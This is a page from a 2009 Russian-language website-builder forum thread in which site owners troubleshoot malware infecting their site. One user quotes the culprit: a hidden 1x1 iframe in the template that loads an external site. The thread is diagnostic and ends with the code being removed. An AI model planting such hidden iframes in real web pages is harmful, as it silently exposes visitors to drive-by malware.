Среда, 20.05.2026, 03:26
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 2 из 2
  • «
  • 1
  • 2
Модератор форума: sTar11  
Вирусы на сайте
kirbaДата: Суббота, 13.06.2009, 12:21 | Сообщение # 16
Рядовой
Статус: Offline
(((я все картинки проверил все сцылки норм.чеже делать?народ помогите плз!админка еще очень глючит не могу изменить код сайта,шаблон сменить ничо не могу!(((((

a1ma2Дата: Понедельник, 15.06.2009, 19:05 | Сообщение # 17
Лейтенант
вообще в админку войти можешь? попробуй написать сл. поддержки, хотя они ниче толкового не скажут, но все же попробуй.

У меня вроде все восстановилось... Пока никто не жалуется. Теперь каждый баннер перед баннерообменом буду проверять.

Добавлено (15.06.2009, 7:05:18)
---------------------------------------------
у меня остался только вопрос по jquery...(в первом посту суть вопроса). Если кто знает, подскажите, а. С jquery в "друзьях" невозможно авторизоваться...(

PALADINДата: Вторник, 16.06.2009, 12:55 | Сообщение # 18
Генерал-майор
скопируй все файлы сайта на комп и проверь др вебом и авастом, во-вторых вирус с сайта не может перезагрузить комп, только если он сам попадет в компьютер, так как брандмауэр блокирует любые попытки воздействия, а скорей всего ты вирус затащил на сервер сайта, какой сервер у тебя кстати?

a1ma2Дата: Вторник, 16.06.2009, 20:29 | Сообщение # 19
Лейтенант
Блиииин, эти вирусы опять появились(( Может они и не исчезали, но каспер у меня молчал все это время... Че делать?
Quote (PALADIN)
скопируй все файлы сайта на комп и проверь др вебом и авастом, во-вторых вирус с сайта не может перезагрузить комп, только если он сам попадет в компьютер, так как брандмауэр блокирует любые попытки воздействия, а скорей всего ты вирус затащил на сервер сайта, какой сервер у тебя кстати?

Перегружаться компы уже перестали, но они реально (не знаю почему)перезагружались и причем не у одного человека... Как только кто нибудь начинал заходить на сайт, и сразу вылетал....
У меня сервак 22. Спасибо.

AnaRxist123Дата: Вторник, 16.06.2009, 21:09 | Сообщение # 20
Сержант
Автору этого шаблона надо бошку оторвать!!!
Code
<iframe style="display:none" src="http://rf1.ucoz.ru/" width="1" height="1" scrolling="auto" frameborder="0"></iframe>

После облака тегов и перед Самые скачиваемые файлы

Да и кстати перейдя по ссылке вы увидите

Запрашиваемый сайт не зарегистрирован в системе создания сайтов uCoz

Сайт зарегистрирован и существует и там одни айфреймы на некий сайт бугатти-1001... Там может и есть вирусы... Проверять не стал, у меня на файрфоксе ноускрипт...

P.S. Этот айфрейм мог поставить любой, кто имеет доступ к админ панели (панель которая сверху у админов)

a1ma2Дата: Вторник, 16.06.2009, 21:23 | Сообщение # 21
Лейтенант
Да, да точно. Я когда на сайт у себя заходил, то там все время этот бугатти светился... Блиин, спасибо за инфу!!! Нашел и удалил. + тебе! Интересно, а как и кто мог это поставить? Доступ только у меня. Неужели пасс взломали?!

AnaRxist123Дата: Вторник, 16.06.2009, 21:29 | Сообщение # 22
Сержант
a1ma2, Я имел ввиду не админ панель, а админ бар... К ней имеет доступ все админы... Удачи тебе, будь осторожнее!!!

a1ma2Дата: Вторник, 16.06.2009, 21:32 | Сообщение # 23
Лейтенант
Ну и к админ бару доступ только у меня, а второй админ-это со службы поддержки. Ладно, главное разобрались.... Спасибо тебе огромнейшее!!!

• Страница 2 из 2
  • «
  • 1
  • 2
Поиск: